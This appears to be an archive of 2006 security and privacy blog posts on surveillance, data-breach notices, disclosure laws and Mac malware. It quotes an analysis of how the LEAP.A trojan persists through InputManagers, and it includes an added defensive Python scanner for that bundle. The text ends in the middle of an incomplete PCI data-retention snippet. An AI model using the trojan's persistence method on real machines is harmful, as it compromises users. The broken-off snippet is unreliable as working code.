An Apollo Program for our times

Teach Florida’s alligators to feed on sharks. Unfortunately, this would deprive CNN of much of its material, so they will oppose it strenuously.

 

US reporters under surveillance

Looks like the Bush administration is tracking reporters’ phone calls. Also, the FBI admits that it uses the Patriot Act to obtain journalists’ phone records in an attempt to determine to whom they have been speaking. Read more here and here, from an ABC News reporter who has received some “attention” from the government. Photo: […]

 

That didn't take long

Verizon is facing a $5 billion lawsuit over its alleged law-breaking. The NYT reports today that this suit may actually involve as much as $50 billion in damage. Previously, a $20 billion suit had been filed regarding the aspects of the NSA program that had become publicly-known in December. Interestingly enough, when you don’t take […]

 

Tip of the iceberg

A former intelligence officer for the National Security Agency said Thursday he plans to tell Senate staffers next week that unlawful activity occurred at the agency under the supervision of Gen. Michael Hayden beyond what has been publicly reported, while hinting that it might have involved the illegal use of space-based satellites and systems to […]

 

Metricon

Because of the lack of proceedings, we have removed the no-dual-submission rule. That is, work submitted elsewhere is ok. Best: Submit a short position paper or description of work done/ongoing. Your submission must be no longer than five (5) paragraphs or presentation slides. Author names and affiliations should appear first in/on the submission. Submissions may be […]

 

Cell phone records market seemingly no longer important?

Massachusetts Congressman Ed Markey asks Dennis Hastert whether legislation protecting mobile phone users’ privacy has been sent to a “legislative ‘Guantanamo Bay’” in order to modify it so that intelligence gathering activities analogous to those affecting land lines would be unimpeded.

 

Data Surveillance Workshop

On June 3, 2006 Harvard University’s Center for Research on Computation and Society will hold a day-long workshop on Data Surveillance and Privacy Protection. Although there has been significant public attention to the civil liberties issues of data surveillance over the past few years, there has been little discussion of the actual techniques that could […]

 

On "Feds' Watch List Eats Its Own"

Ryan Singel opens an excellent article “Feds’ Watch List Eats Its Own,” with a pertinent question. The article is worth reading for its enumeration of how the watch list catches senior military and State Department officials, who also can’t get off the list. It opens: What do you say about an airline screening system that […]

 

Comments

Oops. My bad, I’d turned off comments on a bunch of posts. I think it’s fixed.

 

Free At Last!

“The United States said on Friday it had flown five Chinese Muslim men who had been held at the Guantanamo Bay prison to resettle in Albania, declining to send them back to China because they might face persecution. The State Department said Albania accepted the five ethnic Uighurs — including two whose quest for freedom […]

 

Code Name: Miranda

I admit it, probably ten or more years ago I actually signed up for a supermarket affinity card. Of course, I promptly lost it during the great migration to the suburbs, and for a good while I would simply claim to have left it at home and the cashier would cheerfully use a “store card”, […]

 

The Costs of Torture

I usually try to cut down quotes. This essay by Siva Vaidhyanathan in Slate’s Altercation is worth quoting at length: I was wondering something. Maybe somebody could help me out here. Yesterday a federal jury decided appropriately that this country shall not execute Zacarias Moussaoui, a wanna-be-mass murderer who also happens to be a mentally […]

 

Automated code scanners do have their uses

Slashdot is carrying the story of a rather large bug find in the X11 code. Judging by the patch, it looks like the problem was due to a lack of caffeine: if (getuid() == 0 || geteuid != 0) The OpenBSD code auditors seem to have found this one independently: This is one of those […]

 

Time to Patch

Brian Krebs has a long article, “Time To Patch III: Apple,” examining how long it takes Apple to ship security fixes: Over the past several months, Security Fix published data showing how long it took Microsoft and Mozilla to issue updates for security flaws. Today, I’d like to present some data I compiled that looks […]

 

Security Breach Roundup

State of Ohio, 7.7 million registered voter SSNs, dismal process. From “Ohio Recalls Voter Registration CDs” via Dataloss. Fifth Third Bank employee Marco Antonio Munoz, 74 pages of names of victims, dismal dependence on process, from “Internal theft of personal bank data rare,” in the Cadillac News. Someone’s PR department deserves a bonus for that […]

 

DoD Tricare Management Activity system, SSNs, credit card numbers, health info, 14K people

Via Army Times: The Pentagon said routine monitoring of the Tricare Management Activity’s public servers on April 5 resulted in the discovery of an intrusion and that the personal records had been compromised, leaving open the possibility of identity theft among the members affected. The information contained in the files varied and investigators do not […]

 

Live Free or Die: New Hampshire Rejects National ID

Be it Enacted by the Senate and House of Representatives in General Court convened: Prohibition Against Participation in National Identification System. The general court finds that the public policy established by Congress in the Real ID Act of 2005, Public Law 109-13, is contrary and repugnant to Articles 1 through 10 of the New Hampshire […]

 

aetna insurance,38K customers, names+SSNs, health info, stolen laptop

Report via Reuters. Aetna declined to say where this occurred or which law-enforcement agency they are working with, but it looks like the employer whose folks just got their PII exposed was the US Department of Defense. Stars and Stripes has the scuttlebutt from HQ: The laptop was stolen from an employee’s personal car […]

 

Purdue University, 1351 applicants+students, SSNs, "unauthorized electronic access"

“Unauthorized electronic access”. Not sure if that’s a poorly configured web server, or what. Press release today. Happened in February. Notices sent at some unspecified time. Indiana only requires state agencies to disclose breaches, the law isn’t in effect yet, and the legislative and judicial departments aren’t considered state agencies. Quoth “Mark Smith, head and […]

 

Tony Chor on Presenting at MIX

Tony Chor has a good post on “Backstage at MIX06.” The effort that goes into a good presentation, including the practice, the extra machines, the people to keep them in sync, etc, is really impressive: Normally, when I do a presentation and demo, both the demos and the presentation are on the same machine. I […]

 

Slippery Slope, Gaping Chasm and Torture

In February of last year, I told you about Lester Eugene Siler, a Tennessee man who was literally tortured by five sheriff’s deputies in Campbell County, Tennessee who suspected him of selling drugs. The only reason we know Siler was tortured is because his wife had the good sense to start a recording device about […]

 

Bin Laden Tape

Walid Phares summarizes the new Bin Laden tape at “New Bin Laden Tape: Ten Main Points,” and analyzes it in “Bin Laden’s ‘State of the Jihad’ Speech:” One more time Al Jazeera promotes an Usama Bin Laden speech. After airing portions of the Bin Laden audiotape al Jazeera posted large fragments of the “speech” on […]

 

Man Charged For Notifying USC of Vulnerability

Federal prosecutors charged a San Diego-based computer expert on Thursday with breaching the security of a database server at the University of Southern California last June and accessing confidential student data. A statement from the U.S. Attorney for the Central District of California names 25-year-old Eric McCarty as the person who contacted SecurityFocus last June […]

 

Homo Economicus?

Researchers have identified brain cells involved in economic choice behavior: The scientists, who reported the findings in the journal Nature, located the neurons in an area of the brain known as the orbitofrontal cortex (OFC) while studying macaque monkeys which had to choose between different flavours and quantities of juices. They correlated the animals’ choices […]

 

Have the Terrorists Won?

On Wednesday, officials closed down all security checkpoints at the Hartsfield-Jackson Atlanta International Airport when a “suspicious device” was detected in a screening machine. … All departing flights were stopped, and arriving flights were delayed 90 minutes, affecting 120 flights during the day’s peak travel time, according to the Associated Press. However, after two hours, […]

 

Imagine

I second Alec Muffett’s recommendation of ThePartyParty. In particular, the cover of Imagine is dumbfoundingly bittersweet. Happy Earth Day. [Image: NASA]

 

Statistics

In the latest in the ongoing saga of debit cards being reissued after a breach at an unnamed merchant, 3rd-party, or card processor, we learn that unless a crook stands a chance of getting caught, he’ll keep on stealing: These crooks get away with it, and that’s why they keep doing it. They’ve got about […]

 

Vengeful God Hurts Those With Demands

I forgot to blog this at the time, so will simply say that “Long-Awaited Medical Study Questions the Power of Prayer,” as reported in the NY Times and elsewhere, demonstrates that if there is a god, he prefers those who help themselves.

 

The law is an ass

Nevada is one of a small number of states that actually defines the term ‘encryption’ as used in its breach disclosure law. To wit: NRS 205.4742 “Encryption” defined. “Encryption” means the use of any protective or disruptive measure, including, without limitation, cryptography, enciphering, encoding or a computer contaminant, to: 1. Prevent, impede, delay or disrupt […]

 

State disclosure laws

I’ve written up a comparison of what I believe to be all existing US state disclosure laws with regard to three loopholes that have been discussed by, among others, Rob Lemos and Bruce Schneier recently. I’m experimenting with Blosxom, so I posted this over here. The executive summary is all the state laws could use […]

 

How Low The Bar

The 2nd Circuit Court of Appeals upheld a ruling against a Ms. Cassano, who feared that providing her SSN placed her “in dire jeopardy of having her identity stolen,” refused to provide it, and was terminated. The decision states that “There is no doubt that laws requiring employers to collect SSNs of employees have a […]

 

US Travel ID to have RFID Readable at 25 feet

Declan McCullagh and Anne Broache have the story in “New RFID travel cards could pose privacy threat:” Homeland Security has said, in a government procurement notice posted in September, that “read ranges shall extend to a minimum of 25 feet” in RFID-equipped identification cards used for border crossings. For people crossing on a bus, the […]

 

What Would Jesus Compile?

Generally, when I talk about religion, it’s in the Emacs vs. vi sense. One of my RSS bookmarks contained a somewhat thought-provoking article about the similarities between the philosophy advanced by Free Software Foundation, and certain aspects of Catholic doctrine, and ‘Christian charity’ more broadly. It’s an interesting take on Open Source, and perhaps appropriate […]

 

Internet Explorer Flaw, Transparency, and App Compat

“After IE Attacks, Microsoft Eyes Security Betas” is by Al Sacco at CSOOnline. He has a lot of good orientation and background. Then take a look at Mike Reavy’s “Third party solutions to the Internet Explorer CreateTextRange vulnerability.” Mike runs MSRC, and it’s a pleasant surprise to see him acknowledging customer fears with a post […]

 

Matt Murphy on Microsoft & Transparency

Microsoft needs to be much more transparent about the real nature of the threats customers are facing. Microsoft doesn’t patch phantom vulnerabilities that don’t exist or unrealistic science-fiction attack scenarios. Microsoft’s under-documentation of these vulnerabilities leaves those charged with deploying patches in a tough spot. You simply don’t know what the patches are for. It’s […]

 

Breach Notices Round Up

Because of the volume, I’m going to consolidate these: US Marine Corps/Naval Postgraduate School, 207,750 SSNs, dismal process. From Stars and Stripes, “Thousands of Marines may be at risk for identity theft after loss of portable drive,” via Dataloss list. Marines affected should know there’s an “active duty military” alert you can add to their […]

 

Why trackback spam is bad

% prstat
PID USERNAME SIZE RSS STATE PRI NICE TIME CPU PROCESS/NLWP
14135 nobody 16M 12M sleep 60 0 0:00:11 4.2% mt-tb.cgi/1
14207 nobody 14M 11M run 55 0 0:00:08 4.1% mt-tb.cgi/1
14203 nobody 14M 11M run 56 0 0:00:08 4.1% mt-tb.cgi/1
14209 nobody 14M 11M run 54 0 0:00:08 4.1% mt-tb.cgi/1
14215 nobody 14M […]

 

Market Efficiency from an Evolutionary Perspective

I missed this article when it first came out, but Andrew W. Lo’s “Market Efficiency from an Evolutionary Perspective” is fascinating and readable. The abstract: One of the most influential ideas in the past 30 years of the Journal of Portfolio Management is the Efficient Markets Hypothesis, the idea that market prices incorporate all information […]

 

Metasploit blogging

“Official blog of the Metasploit Project.” Either you know who Metasploit is, in which case you’ve already clicked through, or you’re unlikely to understand their subject matter. PS to Vinnie: Where’s the Smallpox-making post?

 

"Security To The Core"

In a post titled “self-evidently wrong post title” “Blog Posts Do Not Include The Words ‘dizzying array of talent,’” Tom Ptacek points out that Arbor Networks has a blog. Jose Nazario’s “The Market-Driven (Vulnerability) Economy” post is pretty good. However, I think we need video of Dug Song reading this text, which in “News Flash: […]

 

Bad neighbor policy?

Many years ago, I needed to deploy a bunch of UNIX machines very quickly. When I created the golden system image, it included an ntp.conf file that pointed to a nearby public stratum 2 server not under my administrative control. This was dumb, because I could (and should) have just had my boxen chime against […]

 

Presidential Power, At Its Lowest Ebb

Attorney General Alberto R. Gonzales left open the possibility yesterday that President Bush could order warrantless wiretaps on telephone calls occurring solely within the United States — a move that would dramatically expand the reach of a controversial National Security Agency surveillance program. From the Washington Post, “Warrantless Wiretaps Possible in U.S..” It used to […]

 

Lab-Grown Bladders

I’m a little behind in posting this, but modern medical science can be so cool: US scientists have successfully implanted bladders grown in the laboratory from patients’ own cells into people with bladder disease. The researchers, from North Carolina’s Wake Forest University, have carried out seven transplants, and in some the organ is working well […]

 

Startup Opportunity: Revive Systems

My friend Robert Stratton has taken the CTO role at Revive Systems. He’s both a serial startup guy (Wheel Group and UUNet) and has been on the investor side In-Q-Tel. We’ve spent some time talking about the technology, too, and it sounds very intriguing. The remainder of this post is his job description for their […]

 

Competition among laws

Declan McCullagh writes cogently on the matter of national security breach legislation. His article makes many important points, and should be read widely. However, his overall thrust — that federal legislation is inferior to state legislation as a means of addressing security breaches — touches too briefly on an important point: we can have both. […]

 

Google to Acquire Choicepoint

Mountain View, CA., April 1 /PRNewswire/ — Google today announced plans to acquire Alpharetta, GA based Choicepoint. Choicepoint, 2005 winner of the “Lifetime Achievement” Big Brother award, is a data warehouser which collects information on everyone it possibly can, and re-sells it widely. “Google’s mission is to “organize the world’s information and make it universally […]

 

National breach list? Pinch me!

H.R. 3997, the Financial Data Protection Act, is one of the many pieces of legislation proposed in the US to deal with identity theft or notification of security breaches. It was approved by the Financial Services Committee of the House of Representatives on 3/16. I haven’t read the full text of the bill (and it […]

 

"Suffering in Silence With Data Breaches"

That’s a huge loophole that could be used in almost every incidence of stolen data, said Dan Clements, CEO of CardCops.com, a company that tracks the sale of stolen credit cards on the Web. Every law enforcement agency that receives a crime report is going to consider the case “under investigation,” he said. “Only about […]

 

Privacy Grants from the Canadian Privacy Commissioner

The Privacy Commissioner of Canada, Jennifer Stoddart, today announced the renewal of funding through her Office’s Contributions Program which, for the last three years, has allowed some of Canada’s brightest privacy experts to develop a wealth of information on various privacy challenges of the 21st century. From “Privacy Commissioner’s Office renews its cutting-edge privacy research […]

 

196,000 HP Employee SSNs, Fidelity Laptop

A laptop lost by Fidelity this month has exposed 196,000 current and former HP employees, staff were told last night. “This is to let you know that Fidelity Investments, record-keeper for the HP retirement plans, recently had a laptop computer stolen that contained personal information about you, including your name, address, social security number and […]

 

Destructive Chaos

Sorry about the unavailability over the last (unknown time period) My DNS registrar, Joker.com was under DDOS attack. If you’re reading this, you either have a cache, or the attack has been mitigated in some way. We now return you to your regularly scheduled list of stolen laptops, lost backup tapes, and who knows, maybe […]

 

You can't buy publicity like this!

UCSB has a project to digitize wax cylinder recordings. They have thousands cataloged, with the majority downloadable as mp3s. It’s awesome. Naturally, I wanted to see what software they used. Being archivists, they of course go into great detail, including this gem: We’d like to use this space as a soapbox to say that Cleaner […]

 

Art Imitating Life?

Many laughs, and perhaps a tear or two, from The Cubes

 

Breach notification escape mechanisms

In a somewhat incendiary piece published today at Securityfocus.com, Robert Lemos reports on loopholes in notification laws which permit firms to avoid informing people that their personal information has been revealed. According to the article, which along with unnamed “security experts” also cites industry notable Avivah Levitan, “[t]here are three cases in which a company […]

 

I find your faith disturbing

Adam, I learned of the flick via a blog unrelated to either Star Wars or computing, so no need for Google. Not to get all “vi vs. emacs” on you, but I never understood the fascination with Star Wars. :^) Photo cred: kemikore

 

St. Patrick would know what to do

The movie “Jaws” made a lot of money. People like money. Hence, people made derivative movies, “Orca” for example. One copycat, IMO, was so dreadfully bad that it was good. That movie was “Grizzly”, which I saw on its first run. It told the tale of a rogue bear which, you know, basically roamed around […]

 

NJ prosecutor reports debit card ring has been busted

Story at CNET. In related news, OfficeMax says there’s no evidence they were broken into, and back it up with help of outside experts. I’m done being a Kremlinologist on this one, for now. With as little solid info as has made it into the press, it’s just not worth it. Perhaps some facts will […]

 

Identity Theft and Child Pornography

The CBC has a story on how “Global child porn probe led to false accusations:” An international investigation of internet-based child pornography has led to accusations against innocent victims of credit card fraud, a CBC News investigation has found. In other cases, victims of identity theft found themselves fighting to save their reputations, jobs and […]

 

Stolen Ernst and Young laptop had 84,000 SSNs

Information courtesy of the Reporting Form E&Y filed pursuant to New York state law. The consulting firm has been criticized for the delay in reporting this breach, which occurred on January 4.

 

Social Security Administration, 300 Million Americans Not Exposed

I just got my “Your Social Security Statement” in the mail. The very first words on the top of it are “Prevent identity theft—protect your social security number.” Inside, it only prints the password to my cell phone last 4 digits. If your bank, school, or employer does worse, ask them why they’re less enlightened […]

 

New Jersey's breach law

New Jersey’s breach notification law went into effect in mid-December 2005. Like New York’s, it requires that a state entity be notified, in addition to the persons whose info was exposed: c. (1) Any business or public entity required under this section to disclose a breach of security of a customer’s personal information shall, in […]

 

"I've turned into my mother!"

…or, more generally, “I’m now doing that weird thing I saw an influential elder do, but now it seems to make sense”. I have several examples from my own life (generally rather predictable for a balding 40-something suburbanite), but just today I found another one, and I didn’t see it coming.

 

CIBC, One Customer's Wire Transfers, Data They Didn't Use

The federal Privacy Commissioner is looking into a faxing incident involving Canadian Imperial Bank of Commerce and one of its clients. The case began last October when CIBC was told by Christine Soda that she had been receiving faxes at her home in Mississauga that were supposed to be going to Gerry McSorley, who runs […]

 

Ehime Prefectural Police (Japan), Data on unknown # Suspects, Virus

A massive amount of investigation data kept by Ehime Prefectural Police has been leaked onto the Internet, apparently after the computer that kept the data was infected with a virus through the file exchange software Winny, it has been learned. The amount of information leaked from the Ehime police computer is about four times that […]

 

Toyama Japan Hospital, 2,800 patients, file sharing

Information on about 2,800 patients who had surgery at a privately-run hospital in Toyama between 1997 and December 2004 was unintentionally uploaded to the Internet. According to the hospital, the man in charge of data on surgery transferred the information–consisting of patients’ names, sexes, birthdates and information on surgical procedures for which they were hospitalized–to […]

 

SSL Survey over at Matasano

Jeremy Rauch over at Matasano is running a survey on how companies are using HTTPS/SSL. I encourage you to go there and respond. My answers are below the cut.

 

North Carolina Transportation Department, 16,000 credit card #s, outside intruder

The Associated Press is reporting that: An Internet server used by the state Transportation Department’s Ferry Division to process credit card payments for ferry fares may have been breached by outsiders, the agency said Friday. The computer database contained 16,000 credit card numbers, the DOT said. The Office of the State Controller has notified its […]

 

"Worth Reading" (Elements of Blogging Style)

The phrase worth reading is a crutch for lazy writers. I use it a lot, and shall use it less. Please call me, and anyone else you read on this bit of spinelessness in our writing. At least, I’ll endeavor to say why I find something worth reading, and try to suggest which readers might […]

 

Direct Marketing Association opposes consumer right to see, correct information

Access and correction rights are something the DMA wants removed from the bill, Cerasale said. For one thing, it would be expensive for list brokers and compilers to set up procedures enabling consumers to access and correct data. For another, the same hackers who caused the breach could also change the data. Multichannelmerchant.com You can’t […]

 

British Columbia, More than 65,000 SINs, Dismal Process

The provincial government has auctioned off computer tapes containing thousands of highly sensitive records, including information about people’s medical conditions, their social insurance numbers and their dates of birth. Sold for $300 along with various other pieces of equipment, the 41 high-capacity data tapes were auctioned in mid-2005 at a site in Surrey that routinely […]

 

Medco (prescription drug service)/ 4600 people, birth dates, SSNs, drug info/lost laptop

Executive summary: Prescription drug benefits provider Medco employee loses laptop with Ohio government employee (and dependents) info. Waits six weeks to let Ohio know. Ohio complains vociferously. Interestingly, the names of the affected individuals were not on the laptop. Money quote from a Medco spokesperson: You’re as efficient as the lessons learned in the last […]

 

John Robb on Big Bangs

In Big Bangs, John Robb uses complex aircraft dynamics as a fascinating metaphor for society: If we look at today’s global environment we see a moderately unstable system. It is a relatively high performance system that is increasingly controlled by global markets. This explains why it is spreading so quickly. However, our drive towards a […]

 

On Computers and Irony

I’ve been saying for a while that destroying information has an ironic tendency: While it’s quite hard to really destroy data on a computer when you want to, (for example, “Hard-Disk Risk“) it’s quite easy to lose the data by accident. Similarly, while it’s quite hard to make code that runs and does what you […]

 

Security Breach Resources

I’ve put together a small set of web pages containing links to current and pending legislation, breach listings, various on-line resources, and so on. There is probably not much there that is new to most readers of these words, but the fact that it is in one place may be helpful. The URL is http://www.cwalsh.org/BreachInfo/ […]

 

Dear Lazyweb

I’m looking for code that will parse the emails sent by online travel agencies and airlines. Ideally, it would be Python code that allows me to invoke something like itinerary.get_next_flight(msg) and get a dictionary of (to, from, airline, flight #, date), etc. Does such a library exist?

 

Justice Department Weighs In On Google Subpoena

Surprise surprise, the Department of Justice doesn’t think that the Bush administration’s request for search data violates users’ privacy rights. [Edit: Fixed broken link] [Update: Try this link instead. ]

 

Leverage

Consulting firms are interesting beasts. Often, they are able to make great changes in their clients’ organizations, perhaps not so much because their people are smarter, or even more knowledgeable, but because they aren’t subject to the same incentives (pecuniary and otherwise) that client employees face.

 

The future belongs to the quants

The title is of course stolen from Dan Geer. By now, many readers of these words will be familiar with the recent finding in Guin v. Brazos Higher Education Services [pdf] that a financial institution has no duty to encrypt a customer database. In dismissing the case with prejudice, the court took note of an […]

 

"It fell off the truck. No, really."

Via news.com.au: BANK statements, including customers’ private details, were left on the side of a busy Sydney road after the documents fell off the back of a truck. The confidential account information and credit card statements of thousands of Commonwealth Bank customers were left lying on the Hume Highway at Warwick Farm, in Sydney’s south-west, […]

 

40 Million Pounds Sterling Stolen from British Bank

As reported in The Australian, a group of co-ordinated criminals stole over 40 million pounds in cash from a processing center. They did so by the expedient process of dressing up as police officers and kidnapping the wife and child of one of the center’s managers. They then were escorted on site where they subdued […]

 

Ephemeral port security

By now, most have heard about Dubai Ports World, a foreign entity, assuming control of operations at various U.S. ports. The arguments around this transaction are predictable and uninteresting. One thing that is clear is that the Committee on Foreign Investment in the United States (CFIUS) is legally mandated to consider such deals. In fact, […]

 

Updating Windows Mobile Phones

Nothing we ever create, especially software, is ever perfect. One of the banes of professional systems administrators is the software update process, and the risk trade-offs it entails. Patch with a bad patch and you can crash a system; fail to patch soon enough, and you may fall to a known attack vector. The mobile […]

 

Dan Kaminsky on Sony and Anti-Virus

Read “Learning from Sony: An External Perspective” on Dan’s blog: The incident represents much more than a black eye on the AV industry, which not only failed to manage Sony’s rootkit, but failed intentionally. The AV industry is faced with a choice. It has long been accused of being an unproductive use of system resources […]

 

Secretly Admiring

Quick! Name the speaker: In a lot of countries, statements like “this person is over 18”, “this person is a citizen”, the governments will sign those statements. When you go into a chat room, for example, in Belgium, they’ll insist that you present not necessarily the thing that says who you are, but the thing […]

 

Metadata strikes again!

Brian Krebs wrote about a botnet and the 733t d00d who ran one, nom de hack 0x80. Well, turns out the doctored on-line photo the Washington Post ran contained metadata identifying the gentleman’s rather small home town. Coupled with information in Krebs’ article concerning businesses near 0x80’s residence, identifying the young criminal would seem a […]

 

Book Review: The Stag Hunt and the Evolution of Social Structure

Brian Skyrms’ The Stag Hunt and the Evolution of Social Structure addresses a subject lying at the intersection of the social sciences, philosophy, and evolutionary biology — how it is possible for social structures to emerge among populations of selfishly-acting individuals. Using Rousseau’s example of a Stag Hunt, in which hunters face a decision between […]

 

Police report on Cheney shooting incident reveals license info

Yet another incident of ineffective redaction? Adam’s del.icio.us bookmarks alerted me to this blog entry, in which commenters describe the ease with which the drivers’ license numbers of witnesses to the VP’s recent hunting accident are revealed. If this stuff is worth blocking, it’s worth blocking properly.

 

True.com Sent 'Race-Customized' Valentines

How are True.com’s Valentine’s Day e-mails targeted? Very simply: one version of their e-mail targets black singles, another targets East Indian lonely hearts, and other versions target the Asian and Hispanic loveless. (Our multi-cultural bots were lucky enough to get one of each). There’s nothing wrong with that on the surface. But we wondered how […]

 

Police Chiefs Gone Wild

Harold Hurtt has suggested that surveillance cameras be placed “in apartment complexes, downtown streets, shopping malls and even private homes”, according to this story in the Seattle Post Intelligencer. In response, I hereby found…. The Hurtt Prize The Hurtt Prize is a $1120 (and growing) reward for the first person who can provide definitive videotaped […]

 

Safari Users: Don't Open "Safe" files after downloading

Go to preferences, general, and un-select that box. From “Apple Safari Browser Automatically Executes Shell Scripts,” via SANS and Eric Rescorla. Don’t miss Peter da Silva’s comment on Eric’s post. Eric, how do you get such good comments?

 

The Leaf of Trust

One of the most interesting and controversial aspects of Phil Zimmerman’s PGP was that it avoided any central repositories of information, relying instead on what Phil labeled the “web of trust.” The idea was that Alice “trusts” Bob, and Bob “trusts” Charlie, there’s some transitive trust that you can establish.[1] (I’m going to stop putting […]

 

Branded Security

For quite some time, Ian Grigg has been calling for security branding for certificate authorities. When making a reservation for a Joie de Vivre hotel, I got the attached Javascript pop-up. (You reach it before providing a credit card number.) I am FORCED to ask, HOWEVER , what the average consumer is supposed to […]

 

CPNI Public Comment

The FCC has asked for comments on “TELECOMMUNICATIONS CARRIER’S USE OF CUSTOMER PROPRIETARY NETWORK INFORMATION AND OTHER CUSTOMER INFORMATION.” “Customer Proprietary Network Information” is newspeak for “selling your phone records.” Several anonymous readers commented on “Selling Your Phone Records” about their troubles with T-Mobile. Here’s a chance to tell the FCC what you went through. […]

 

The World's Greatest Rock and Roll Band?

Ok, so the Stones are playing, free, in Rio. I figure the crowd will be big. Maybe huge. Apparently not a record-breaker, though: Saturday’s crowd may not be as big as that at Rod Stewart’s 1994 concert, also at Copacabana beach, which drew a crowd of 3.5 million. Rod Stewart?

 

Salesman uses credit application to stalk and rape customer

Police say a convicted murderer used his job as a car salesman in Sandy to track a female customer to her home and rape her. Cleon Jones, 34, was arrested Wednesday on multiple first-degree felonies and remains in the Salt Lake County Jail without bail. Authorities allege Jones tracked down his victim by using her […]

 

University of Northern Iowa, 6000 W-2 forms, virus-infected laptop

An IT person troubleshoots dodgy printing of US earnings documents by loading 6,000 of them onto a laptop. Hilarity ensues when the laptop later turns out to be infected with malware detected during “routine monitoring”. Via wcfCourier.com: The University of Northern Iowa has warned students and faculty to monitor their bank accounts after someone accessed […]

 

Custom Shirts

Get your custom shirts with font size controlled by word frequency. It’s shirts-2.0, now available from Snapshirts. Cool.

 

John Robb on the Next Attack

John Robb has some very interesting thoughts on the next major al Qaeda attack on the United States in “The Next Attacks on America:” The impact of these attacks, particularly if they are numerous (attracting copycats?) and spread out over an extended period of time will be severe. Given their lack of symbolic content (and […]

 

Old Dominion, 601 SSNs, Grad Student's Dismal Process

In 2004, a graduate student apparently posted a class roster of 601 students, complete with names and social security numbers, on the web. (“ODU Graduate Student Posts Student Information on Website, School Investigating,” via Netsec.) Update: Lyger of Attrition pointed out that the dates in the WAVY-TV story don’t add up. There’s a story in […]

 

Second OSX Proof of Concept

Today we got a sample of a rather interesting case, a Mac OS X Bluetooth worm that spreads over Bluetooth. OSX/Inqtana.A is a proof of concept worm for Mac OS X 10.4 (Tiger). It tries to spread from one infected system to others by using Bluetooth OBEX Push vulnerability CAN-2005-1333. Via F-Secure. I feel weird linking […]

 

Dept of Agriculture, 350,000 Tobacco Farmers, Dismal Process

The Agriculture Department says it accidentally released Social Security numbers and tax IDs for 350,000 tobacco farmers. But the department says those who received the information agreed to destroy copies and return discs to the government. The agency said it inadvertently released the data in response to Freedom of Information Act requests about the tobacco […]

 

Blue Cross of Florida, 27,000 employee SSNs, Contractor

The names and Social Security numbers of about 27,000 Blue Cross and Blue Shield of Florida current and former employees, vendors and contractors were sent by a contractor to his home computer in violation of company policies, the company said Thursday. The contractor had access to a database of identification badge information and transferred it […]

 

LEAP.A Mac Trojan

There seems to be a trojan out for the Mac. See New MacOS X trojan/virus alert, developing…. There are some interesting tidbits: 6a) If your uid = 0 (you’re root), it creates /Library/InputManagers/ , deletes any existing “apphook” bundle in that folder, and copies “apphook” from /tmp to that folder 6b) If your uid != 0 […]
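The persistence step in that write-up is the useful part for anyone checking a Mac: Input Manager bundles are loaded into every Cocoa application, so anything unexpected in an InputManagers folder is worth a look. The scanner below is an added example, not code from the post or from the analysis it quotes. It assumes the non-root branch (truncated above) drops the bundle into the user’s own ~/Library/InputManagers, which is where per-user Input Managers normally live; the directory tree it scans is constructed in a temporary folder so the example runs anywhere.

```python
import os
import tempfile

# Path named in the LEAP.A write-up for the uid == 0 case (relative to /).
SYSTEM_INPUT_MANAGERS = os.path.join("Library", "InputManagers")


def scan_input_managers(root, home_dirs, suspect_names=("apphook",)):
    """Return (path, is_suspect) for every bundle found in the system and
    per-user InputManagers folders.

    Anything listed deserves review: a legitimate machine usually has none.
    Entries whose name matches the write-up ("apphook") are flagged outright.
    """
    candidates = [os.path.join(root, SYSTEM_INPUT_MANAGERS)]
    # Assumption for the example: the uid != 0 branch uses the user's own
    # ~/Library/InputManagers, which is the standard per-user location.
    candidates += [os.path.join(h, "Library", "InputManagers") for h in home_dirs]

    findings = []
    for folder in candidates:
        if not os.path.isdir(folder):
            continue
        for entry in sorted(os.listdir(folder)):
            path = os.path.join(folder, entry)
            findings.append((path, entry.lower() in suspect_names))
    return findings


def run_example():
    """Build a constructed directory tree mirroring the write-up and scan it."""
    base = tempfile.mkdtemp()
    fake_root = os.path.join(base, "root")
    system_dir = os.path.join(fake_root, SYSTEM_INPUT_MANAGERS)
    os.makedirs(os.path.join(system_dir, "apphook"))            # the trojan's bundle
    os.makedirs(os.path.join(system_dir, "SomeLegit.bundle"))   # constructed benign entry
    home = os.path.join(base, "Users", "alice")
    os.makedirs(os.path.join(home, "Library", "InputManagers", "apphook"))
    return scan_input_managers(fake_root, [home])


if __name__ == "__main__":
    for path, suspect in run_example():
        print(("SUSPECT " if suspect else "review  ") + path)
```

On a real machine you would call it as `scan_input_managers("/", ["/Users/<name>" ...])`; the name match is only a hint, since a renamed bundle is just as dangerous, which is why every entry is reported.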

 

Suffolk County, NY, 7,000+ SSNs, Dismal Process Failures

The Suffolk county [New York] clerk’s office has exposed the Social Security numbers of thousands of homeowners on its Web site, and officials said they don’t have a way to remove them. And soon, a new plan will make it easier to retrieve them. Mortgages and deeds that contain Social Security numbers for an estimated […]

 

Thank You, Choicepoint

It’s been a year since Choicepoint fumbled their disclosure that Nigerian con man Olatunji Oluwatosin had bought personal information about 160,000 Americans. Bob Sullivan broke the story in “Database giant gives access to fake firms,” and managed to presage much of what’s happened in the opening paragraphs of his story: Last week, the company notified […]

 

Risk aggregation and the living dead

Light blue touchpaper is a new web log written by researchers in the Security Group at the University of Cambridge Computer Laboratory. You should read it. As for the headline, zombies eat brains. There’s plenty of ’em [edited to add: brains, that is!!] in close proximity in Ross Anderson’s group. ’nuff said.

 

Emergent Intelligence

John Robb has a fascinating post on how networked organizations learn and improve their orientation as they engage with their worlds. In “Emergent Intelligence,” Robb focuses on the Iraqi insurgency, but draws important and general lessons. He says there are five factors needed for emergent intelligence: A critical mass of participation. I’d suggest that a […]

 

The 4th Amendment is Nice to Have

Cities can require stores to send customers’ identification to an electronic database for police to monitor, judges in two [Canadian] provinces have ruled this week. Cash Converters Canada Inc. and British Columbia’s largest pawn shop have each failed to persuade judges that a new generation of city bylaws is trampling customers’ legal rights. From “Courts […]

 

Free advice for merchants accepting payment cards

3. Protect Stored Data 3.1 Keep cardholder information storage to a minimum. Develop a data retention and disposal policy. Limit your storage amount and retention time to that which is required for business, legal, and/or regulatory purposes, as documented in the data retention policy. 3.2 Do not store sensitive authentication data subsequent to authorization (not […]
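Requirements 3.1 and 3.2 describe two concrete controls: write only what the business needs, never keep sensitive authentication data once the authorization has come back, and purge what you kept when the retention period is up. The code below is an added example of how a merchant’s own system might implement both; it is not from the post or from the PCI standard. Field names (pan, cvv, track2, pin_block, auth_code) and the sample authorization data are constructed for the example.

```python
from datetime import datetime, timedelta

# "Sensitive authentication data" in PCI DSS terms: card verification code,
# full magnetic-stripe track data and PIN blocks. These never survive
# authorization, not even encrypted. The field names are assumed for the example.
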